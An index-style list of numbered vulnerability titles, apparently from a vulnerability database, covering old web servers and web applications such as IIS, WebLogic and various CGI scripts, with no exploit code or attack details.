[1442] LocalWEB HTTP Long Get Request Parsing Remote Overflow DoS
[1423] Netwin DMailWeb / CWMail Server POP Trust DoS
[1422] Netwin DMailWeb / CWMail Malformed Username Arbitrary Mail Relay
[1414] BEA WebLogic Server/Express file Servlet Source Code Disclosure
[1397] Selena Sol WebBanner Traversal Arbitrary File Access
[1391] IBM WebSphere Upper Case JSP Request Source Code Disclosure
[1350] HP Web JetAdmin wja Traversal Arbitrary File Access
[1327] Gordano NTMail Web Configuration Server Request Proxy Restriction Bypass
[1311] L-Soft LISTSERV Web Archives Buffer Overflow
[1273] SalesLogix eViewer slxweb.dll Request Remote DoS
[1264] Netscape Enterprise Server Web Publishing Directory Listing
[1249] StarOffice StarScheduler Web Server Traversal Arbitrary File Access
[1248] StarOffice StarScheduler Web Server GET Request Overflow
[1211] Rightfax Webclient Predictable Session Number Hijack
[1210] Microsoft IIS WebHits.dll ISAPI Filter Traversal Arbitrary File Access
[1203] Multiple BSD /proc File System mem Interface Modification Privilege Escalation
[1191] Allaire Spectra Webtop Explicit URL Authentication Bypass
[1177] Savant Web Server GET Request NULL Character Handling Remote DoS
[1174] WebWho+ whois.pl type Parameter Arbitrary Command Execution
[1152] Microsoft IE Web Proxy Auto-Discovery Unauthorized Proxy Reconfiguration
[1127] Falcon Web Server Arbitrary File Access
[1126] Zeus Technologies Zeus Web Server Arbitrary File Retrieval
[1125] Squid Web Proxy Newline Cross-User Authentication Bypass
[1067] Bluestone Sapphire Web Server Predictable Session ID Hijacking
[959] SmartDesk WebSuite Long URL Overflow
[902] Webmin Password Brute Force Weakness
[877] Multiple Web Server Dangerous HTTP Method TRACE
[846] iPlanet/One Web Server search Arbitrary File Access
[829] IBM WebSphere Application Server (WAS) Java Servlet Error Page XSS
[825] LocalWEB2000 Directory Traversal Arbitrary File Access
[819] Macromedia JRun Web Server (JWS) GET Request Traversal Arbitrary File Access
[787] Compaq Web-enabled Management Software HTTP Server Arbitrary Traffic Proxy
[786] Cabletron WebView Information Disclosure
[722] Novell GroupWise Web Access Path Disclosure
[706] Oracle Internet Application Server (IAS) WebDB/Portal Component mod_plsql Request DAD File Disclosure
[682] Webalizer DNS Lookup Host Name XSS
[675] Oracle Application Server Web Cache Null Character Request Remote DoS
[672] IBM Informix Web Datablade ifx Module Traversal Arbitrary File/Directory Access
[668] Horde IMP Webmail status.php3 message Parameter XSS
[659] Novell GroupWise webacc Malformed User Path Disclosure
[646] WebDiscount eshop.pl seite Parameter Arbitrary Command Execution
[644] Apple Mac OS X Find-By-Content .FBCIndex Web File Content Disclosure
[640] Textor Webmasters Ltd listrec.pl TEMPLATE Variable Arbitrary Command Execution
[617] VisualRoute Web Server Arbitrary Host Traceroute
[616] Tripwire for Web Pages Installation Disclosure
[613] SiteScope Web Management Server SiteScope.html Information Disclosure
[610] Oracle Applications One-Hour Install Web Server Unauthenticated Configuration Modification
[603] SIX-webboard generate.cgi content Parameter Traversal Arbitrary File Access
[589] Sambar Web Server pagecount CGI Traversal Arbitrary File Overwrite
[576] BEA WebLogic Encoded Request Forced Directory Listing
[575] Tarantella Enterprise ttawebtop.cgi pg Parameter Traversal Arbitrary File Access
[571] Netscape Enterprise Web Publishing INDEX Command Arbitrary Directory Listing
[561] Apache Web Servers mod_status /server-status Information Disclosure
[560] Check Point FireWall-1 Web Server Account Name Disclosure
[525] Microsoft IIS Webserver Invalid Filename Request Arbitrary Command Execution
[517] Savant Web Server Malformed GET Request CGI Source Disclosure
[514] Pi3Web tstisap.dll URL Handling Remote Overflow
[512] WebSPIRS webspirs.cgi sp.nextform Parameter Traversal Arbitrary File Access
[510] W3.org Anaya Web sendtemp.pl templ Variable Traversal Arbitrary File Access
[507] PALS Library System WebPALS pals-cgi Traversal Arbitrary File Read
[502] HSWeb HTTP Server /cgi/ Directory Request Path Disclosure
[500] Allaire JRun Crafted Request WEB-INF Forced Directory Listing
[498] iWeb Hyperseek 2000 hsx.cgi show Parameter Traversal Arbitrary File Access
[497] Basilix Webmail .class / .inc Direct Request Remote Information Disclosure
[489] IBM Informix webdriver CGI Unauthenticated Database Access
[487] Samba Web Administration Tool (SWAT) Error Message Username Enumeration
[465] MailMan Webmail mmstdod.cgi ALTERNATE_TEMPLATES Parameter Arbitrary Command Execution
[456] NAI WebShield SMTP Malformed From: Header Remote DoS
[437] iPlanet Web Server SHTML Logging Filename Remote Overflow
[432] Bytes Interactive Web Shopper shopper.cgi Traversal Arbitrary File Access
[431] eXtropia Web Store web_store.cgi Traversal Arbitrary File Access
[426] Boa Web Server Traversal Arbitrary File Access/Execution
[425] Microsoft IIS WebDAV SEARCH Method Arbitrary Directory Forced Listing
[420] Extent RBS Web Server Image Parameter Traversal Arbitrary File Access
[406] Sun Java Web Server bboard Servlet Command Execution
[404] Apache HTTP Server on SuSE Linux WebDAV PROPFIND Arbitrary Directory Listing
[397] Multiple Web Server Dangerous HTTP Method PUT
[392] Simple Web Counter swc ctr Parameter Remote Overflow
[383] Multiple Web Server UserDir 'nobody' Request Arbitrary File Access
[378] Roxen Web Server /%00/ Encoded Request Forced Directory Listing
[375] O'Reilly WebSite Pro GET Request Remote Overflow
[374] O'Reilly WebSite Pro webfind.exe keywords Parameter Remote Overflow
[369] WebActive HTTP Server active.log Remote Information Disclosure
[364] CVSWeb cvsweb.cgi Shell Metacharacter Arbitrary Command Execution
[337] Imate Webmail Server HELO Command Remote Overflow
[327] NAI WebShield SMTP SET_CONFIG Overflow
[326] NAI WebShield SMTP GET_CONFIG Information Disclosure
[322] NAI Gauntlet / WebShield CyberPatrol Content Monitoring System Remote Overflow
[294] Cart32 c32web.exe CGI Component Admin Password Manipulation
[280] talentsoft Web+ webplus CGI script Parameter Traversal Arbitrary File Access
[271] Microsoft IIS WebHits null.htw .asp Source Disclosure
[264] Oracle Web Listener /ows-bin/ Directory Arbitrary Command Execution
[254] Zeus Technologies Zeus Web Server Null Byte Request CGI Source Disclosure
[240] Progress WebSpeed Messenger Administration Utility Unauthenticated Access
[239] WebSite Pro Malformed URL Path Disclosure
[238] Web Server robots.txt Information Disclosure
[237] WebGais websendmail CGI Arbitrary Command Execution
[236] WebGais webgais CGI Arbitrary Command Execution
[235] IRIX webdist.cgi distloc Parameter Arbitrary Command Execution
[234] Webcart Default Install Configuration Disclosure
[229] O'Reilly WebSite uploader.exe Arbitrary File Upload
[215] Samba Web Administration Tool (SWAT) cgi.log Symlink Arbitrary File Modification
[200] Multiple Web Server CGI Directory Command Interpreter
[155] Roxen Web Server Counter Module CPU Consumption DoS
[113] Tektronix PhaserLink Printer Web Server Direct Request Administrator Access
[111] Microsoft Personal Web Server Multiple Dot Request Arbitrary File Access
[91] Web Server Version Disclosure
[62] Multiple Web Server finger CGI Information Disclosure
[55] Excite for Web Server architext_query.pl Shell Metacharacter Arbitrary Command Execution
[49] IBM Lotus Domino Web Server ?open Forced Directory Listing
[31] CERN httpd Virtual Web Path Disclosure
[12] Alibaba Web Server HTTP Request Overflow DoS
[10] Alibaba Web Server Traversal Arbitrary File Access
[8] O'Reilly WebSite win-c-sample Remote Overflow
|